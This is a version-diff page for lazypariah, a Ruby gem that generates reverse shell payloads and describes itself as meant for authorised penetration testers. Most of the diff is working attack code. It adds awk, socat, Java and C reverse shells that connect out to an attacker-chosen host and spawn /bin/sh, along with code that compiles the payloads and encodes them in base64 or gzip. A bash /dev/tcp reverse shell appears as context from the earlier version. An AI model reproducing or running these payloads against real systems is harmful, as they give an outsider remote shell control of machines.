lazypariah 0.2.0 → 0.3.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of lazypariah might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. data/bin/lazypariah +84 -3
  3. metadata +4 -3
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: bd291a993c069eed15490793163c44f1a71ffa52a14a5764c100e67e9fd83387
4
- data.tar.gz: '0589412c913bccca3beff307194761fb0e495fdc2b2bb717e8f817587f294874'
3
+ metadata.gz: ce53f8f317c07ff9692f984dcf1b4854ef9775f0cd10d62cbb010dd0d5a8f8a9
4
+ data.tar.gz: 513ac2a8a3a6eef6548c5a7d515c5c5a55b63550ddbd432c49516a346f719984
5
5
  SHA512:
6
- metadata.gz: 18ee080a774d2d8606eb52afbc2c8ece30844a42b1dd9717acb55f9f271c81683a465ac2dcdb9fbbd89c8d4868795ea5131ebd631157d6348e46619ed86270d1
7
- data.tar.gz: 3ebcd058ab7994a3ed8b59b1b0c4df41779c0b349b143c0eac6913e1e71ad7c878f25d9cbe6f71e7a281b0fce707c108cb05dc66929367ffde2905196bddf060
6
+ metadata.gz: b2a86bb13615232d2cc9610728084e466ec70f9bb91c972c0f557990efde7cebbaead6b47906d088facffc2e2d35755dbc7ff93482ee93c06c51666b1b641a8f
7
+ data.tar.gz: 94da5b8370ffff1708d1c1e8c0b973f71d07d4c014592d5267f66fa61182a85fcf981e1928f63dc0241e5c54ea204bad29a5d0fa6fa7d3b23c665f1be0deb532
@@ -1,7 +1,7 @@
1
1
  #!/usr/bin/env ruby
2
2
  #
3
3
  # Title: LAZYPARIAH
4
- # Version: 0.2.0
4
+ # Version: 0.3.0
5
5
  # Description:
6
6
  # LAZYPARIAH is a simple tool for generating various reverse shell payloads
7
7
  # on the fly. It is intended to be used only in authorised circumstances by
@@ -24,10 +24,12 @@
24
24
  require "base64"
25
25
  require "optparse"
26
26
  require "erb"
27
+ require "zlib"
28
+ require "stringio"
27
29
 
28
30
  # Define constants.
29
31
  PROGRAM_NAME = "LAZYPARIAH".freeze()
30
- PROGRAM_VERSION = "0.2.0".freeze()
32
+ PROGRAM_VERSION = "0.3.0".freeze()
31
33
  EXECUTABLE_NAME = "lazypariah".freeze()
32
34
 
33
35
  # Define payload list.
@@ -58,7 +60,16 @@ PAYLOAD_LIST = [
58
60
  "ruby",
59
61
  "ruby_c",
60
62
  "ruby_b64",
61
- "bash_tcp"
63
+ "bash_tcp",
64
+ "awk",
65
+ "socat",
66
+ "java_class_binary",
67
+ "java_class_b64",
68
+ "java_class_gzip_b64",
69
+ "c_binary",
70
+ "c_binary_b64",
71
+ "c_binary_gzip",
72
+ "c_binary_gzip_b64"
62
73
  ].sort()
63
74
 
64
75
  # Define function for displaying program information.
@@ -202,6 +213,76 @@ begin
202
213
  print_output("echo #{code} | base64 -d | ruby", url_encode=url_encode)
203
214
  when "bash_tcp"
204
215
  print_output("bash -i >& /dev/tcp/#{ARGV[1]}/#{ARGV[2]} 0>&1", url_encode=url_encode)
216
+ when "awk"
217
+ print_output("awk 'BEGIN {s = \"/inet/tcp/0/#{ARGV[1]}/#{ARGV[2]}\"; while(42) {do {printf \"[Awk Reverse Shell] >> \" |& s; s |& getline c; if (c) {while ((c |& getline) > 0) print $0 |& s; close(c);}} while (c != \"exit\") close(s);}}' /dev/null", url_encode=url_encode)
218
+ when "socat"
219
+ print_output("socat tcp-connect:#{ARGV[1]}:#{ARGV[2]} system:/bin/sh")
220
+ when "java_class_binary", "java_class_b64", "java_class_gzip_b64"
221
+ code = "import java.io.IOException;import java.io.InputStream;import java.io.OutputStream;import java.net.Socket;public class rs {public rs() throws Exception {Process p=new ProcessBuilder(\"/bin/sh\").redirectErrorStream(true).start();Socket s=new Socket(\"#{ARGV[1]}\",#{ARGV[2]});InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0) {so.write(pi.read());}while(pe.available()>0) {so.write(pe.read());}while(si.available()>0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}}"
222
+
223
+ temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
224
+ temp_file = temp_dir+"/rs.java"
225
+
226
+ system("echo '#{code}' > #{temp_file}; javac #{temp_file};")
227
+
228
+ File.open(temp_dir+"/rs.class", "r") do |f|
229
+ java_payload = f.read()
230
+ case ARGV[0]
231
+ when "java_class_binary"
232
+ print_output(java_payload)
233
+ when "java_class_b64"
234
+ java_payload_b64 = Base64.strict_encode64(java_payload)
235
+ print_output(java_payload_b64, url_encode=url_encode)
236
+ when "java_class_gzip_b64"
237
+ sio = StringIO.new()
238
+ sio.binmode()
239
+ gz = Zlib::GzipWriter.new(sio)
240
+ gz.write(java_payload)
241
+ gz.close()
242
+ java_payload_gzip = sio.string
243
+ java_payload_gzip_b64 = Base64.strict_encode64(java_payload_gzip)
244
+ print_output(java_payload_gzip_b64, url_encode=url_encode)
245
+ end
246
+ end
247
+
248
+ system("rm -r #{temp_dir}")
249
+ when "c_binary", "c_binary_gzip", "c_binary_b64", "c_binary_gzip_b64"
250
+ code = "#include <stdio.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\nint main(void){int port = #{ARGV[2]};struct sockaddr_in revsockaddr;int sockt = socket(AF_INET, SOCK_STREAM, 0);revsockaddr.sin_family = AF_INET;revsockaddr.sin_port = htons(port);revsockaddr.sin_addr.s_addr = inet_addr(\"#{ARGV[1]}\");connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));dup2(sockt, 0);dup2(sockt, 1);dup2(sockt, 2);char * const argv[] = {\"/bin/sh\", NULL};execve(\"/bin/sh\", argv, NULL);\nreturn 0;}"
251
+
252
+ temp_dir = IO.popen("mktemp -dt lazypariah_XXXXXXXX").read().chomp()
253
+ temp_file = temp_dir+"/rs.c"
254
+
255
+ system("echo '#{code}' > #{temp_file}; gcc #{temp_file} -o #{temp_dir+"/rs"};")
256
+
257
+ File.open(temp_dir+"/rs", "r") do |f|
258
+ binary_payload = f.read()
259
+ case ARGV[0]
260
+ when "c_binary"
261
+ print_output(binary_payload)
262
+ when "c_binary_b64"
263
+ binary_payload_b64 = Base64.strict_encode64(binary_payload)
264
+ print_output(binary_payload_b64)
265
+ when "c_binary_gzip"
266
+ sio = StringIO.new()
267
+ sio.binmode()
268
+ gz = Zlib::GzipWriter.new(sio)
269
+ gz.write(binary_payload)
270
+ gz.close()
271
+ binary_payload_gzip = sio.string
272
+ print_output(binary_payload_gzip, url_encode)
273
+ when "c_binary_gzip_b64"
274
+ sio = StringIO.new()
275
+ sio.binmode()
276
+ gz = Zlib::GzipWriter.new(sio)
277
+ gz.write(binary_payload)
278
+ gz.close()
279
+ binary_payload_gzip = sio.string
280
+ binary_payload_gzip_b64 = Base64.strict_encode64(binary_payload_gzip)
281
+ print_output(binary_payload_gzip_b64, url_encode=url_encode)
282
+ end
283
+ end
284
+
285
+ system("rm -r #{temp_dir}")
205
286
  end
206
287
  end
207
288
  end
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: lazypariah
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.2.0
4
+ version: 0.3.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Peter Funnell
8
8
  autorequire:
9
9
  bindir: bin
10
10
  cert_chain: []
11
- date: 2020-11-22 00:00:00.000000000 Z
11
+ date: 2020-11-23 00:00:00.000000000 Z
12
12
  dependencies: []
13
13
  description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
14
14
  on the fly. It is intended to be used only in authorised circumstances by qualified
@@ -42,7 +42,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
42
42
  - !ruby/object:Gem::Version
43
43
  version: '0'
44
44
  requirements:
45
- - A GNU/Linux or BSD operating system.
45
+ - A GNU/Linux or BSD operating system. Optional requirements are GCC (for C payloads)
46
+ and OpenJDK (for Java payloads).
46
47
  rubygems_version: 3.1.2
47
48
  signing_key:
48
49
  specification_version: 4